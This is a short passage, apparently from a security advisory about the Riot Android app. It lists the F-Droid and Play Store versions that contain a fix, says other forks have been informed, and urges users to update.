The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.